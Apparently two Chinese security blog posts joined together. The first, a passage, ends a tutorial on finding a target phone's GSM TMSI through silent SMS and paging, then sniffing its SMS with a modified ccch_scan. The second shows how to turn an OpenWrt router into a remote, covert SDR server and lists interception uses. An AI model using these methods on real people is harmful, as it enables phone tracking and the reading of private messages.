            fprintf(stderr, "Invalid TMSI\n");
            exit(-1);
        }
        app_state.finding = 0;
        break;
    case 'f':
        app_state.finding = 1;
        app_state.mincnt= atoi(optarg);
        break;
    default:
        return -1;
    }
    return 0;
}

运行ccch_scan来开始筛选TMSI,我们要求程序列出Paging超过16次的TMSI:

TMSIfilter0.jpg

同时显示发送和筛选两个窗口,有的TMSI随着每次短信发送有节奏的出现,很快有一个TMSI就引起了我们的注意:818003B5,随着不断的发送短信,还不到10次短信,我们已经可以确定目标TMSI就是它。而且可以看出当前网络每传递一次短信就侦听到4次Paging:

TMSIfilter.jpg

我们拿出目标手机来确认一下,果然是这个TMSI。注意,为了工作方便,朝阳群众大都随身携带这种已开启Net Monitor的Nokia 3110手机:

TMSIResult.jpg

用WireShark来侦听目标手机接收到的短信:

receivesniff.jpg

用我修改过的ccch_scan来侦听并解码目标手机所在基站的下行短信:

sniffsms.jpg

0x06 后记

手机通信安全跨着通信和计算机两个专业领域,两者都精通的安全研究人员比较少,因而一直缺少成熟好用的攻击工具。要想玩好手机安全,一定要自己动手编程,打造自己的安全工具。

本文没有涉及LTE下的TMSI筛选和手机定位,但是Paging的原理类似,而且下行的数据报文传递前也会产生Paging信息,再加上运营商的2G/3G/4G是可以互操作的,因而可以利用的途径更多。惟一的问题是缺少基带开源的LTE手机,我们要玩LTE,就必须使用SDR,导致成本不够亲民。即使发送Silent SMS仍然使用C118/C139,侦听LTE通信也必须使用SDR。而且因为我国特殊的频段划分,LTE没有得到低端的黄金频段,基本集中在1900MHz和2600MHz,这样便宜的RTL-SDR也就无能为力了,玩LTE最差也要买个HackRF,但目前国产山寨HackRF质量还不稳定。。。

关于LTE下的玩法,未来找时间专文再探讨吧。

如何用极路由+OpenWrt+RTL电视棒搭建一台SDR服务器,并隐秘地捕获和传输数据

cn0xroot一条评论

本文作者:雪碧0xroot @漏洞盒子安全团队 cn0xroot.github.io
首发地址:http://www.freebuf.com/articles/wireless/121961.html

0x00 前言

近期因为有个从异地捕获无线信号的需求,便尝试着用OpenWrt+公网IP搭建了一台SDR服务器。如果有小伙伴嫌SDR硬件天线看起来太乱、或者电脑没有足够的USB接口也可在局域网搭建SDR服务器通过TCP/IP调用SDR硬件。

IMG_1741.JPG

HiWiFi router

0x01 获取root

刚买的极路由关闭了root功能,需要开启路由的开发者模式后才能通过SSH连入shell交互界面。申请开发者模式流程:进入路由器后台-云平台-路由器信息-高级设置-申请-绑定手机-输入验证码-绑定微信-微信账号绑定极路由账号。

下图是开启开发者模式前后的Nmap扫描结果:

Nmap

开启开发者模式后可通过1022端口进入路由器shell界面:

ssh root@192.168.199.1 -p 1022

ssh

0x02 极路由刷不死uboot

开启开发者模式后可对设备进行刷机,为了防止设备变砖可在设备刷入具有不死uboot之称的Breed Bootloader。在 http://breed.hackpascal.net/ 页面找到对应型号的uboot (极路由1s:HC5661、极路由2s:HC5761、极路由3:HC5861)

下载、刷入uboot

cd /tmp
wget http://breed.hackpascal.net/breed-mt7620-hiwifi-hc5861.bin
mtd -r write  breed-mt7620-hiwifi-hc5861.bin u-boot

显示rebooting后等待路由重启完成。

重启完毕后三灯亮起,这时需断开电源,按住路由器的RST重置键然后再通电,当看到电源灯闪烁时可以松开RST键。电脑通过网线接入后自动获取ip,用浏览器192.168.1.1即可登陆Breed控制台。

安全起见,备份所有内容:

0x03 极路由刷OpenWrt

由于SDR服务器需要一个USB接口来插电视棒,所以需要在购买极路由的时候选一款带USB接口的机器。其它带USB接口的OpenWrt路由器也适用下文的内容.

查看CPU信息:

cat /proc/cpuinfo

下载OpenWrt固件: 选择自己路由器对应的版本

cd /tmp
wget http://rssn.cn/roms/openwrt-15.05-ramips-mt7620-hc5861-squashfs-sysupgrade.bin
sysupgrade -F -n openwrt-15.05-ramips-mt7620-hc5861-squashfs-sysupgrade.bin

0x04OpenWrt安装RTL驱动

OpenWrt刷入重启后,进入管理界面:http://192.168.1.1user:rootpass:root

设置SSH密码

ssh root@192.168.1.1

Openwrt可以使用opkg命令对软件包进行管理

opkg update
opkg list |grep rtl
opkg install rtl-sdr

安装完成后便可将电视棒插入路由器的USB接口:

IMG_1743.JPG

启动OpenW上的rtl-sdr

OpenWrt终端执行:

rtl_tcp -a 192.168.1.1 -n 8 -b 8

之后OpenWrt上将开启1234端口:

0x05使用SDR服务

客户机上执行:

osmocom_fft -W -s 2000000 -f 144000000 -a 'rtl_tcp=192.168.1.1:1234'


osmocom_fft -F -s 1.5e6 -f 101e6 -a 'rtl_tcp=192.168.1.1:1234'

Clipboard Image.png

grqx

0x06利用场景

1.可在机场塔台、港口等地方使用SDR服务器监测ADB-S、AIS(船舶自动识别系统Automatic Identification System)

2.利用SDR+WIFI捕获 语音、图像数据:

Clipboard Image.png

Clipboard Image.png

更多细节可参考DefCon Paper:

Clipboard Image.png

Clipboard Image.png

Clipboard Image.png

How Hackers Could Wirelessly Bug Your Office
Video:YouTuBe

MayBe还能通过SDR服务器利用MouseJack漏洞对办公区域的键盘鼠标输入进行监听:

http://www.freebuf.com/articles/terminal/97011.html

http://www.freebuf.com/articles/wireless/115440.html

0x07 Refer

https://github.com/rssnsj/openwrt-hc5x61

http://www.binss.me/blog/install-openwrt-on-hiwifi-router/

http://www.right.com.cn/forum/thread-161906-1-1.html

http://www.levey.cn/352.htm

http://www.right.com.cn/forum/thread-161906-1-1.html

http://yo2ldk.blogspot.com/2016/03/wireless-sdr-receiver.html

http://adventurist.me/posts/0050

http://sdr.osmocom.org/trac/wiki/rtl-sdr
*本文作者:雪碧0xroot @漏洞盒子安全团队 cn0xroot.github.io,本文提供的工具、方法仅供安全研究用途,禁止非法使用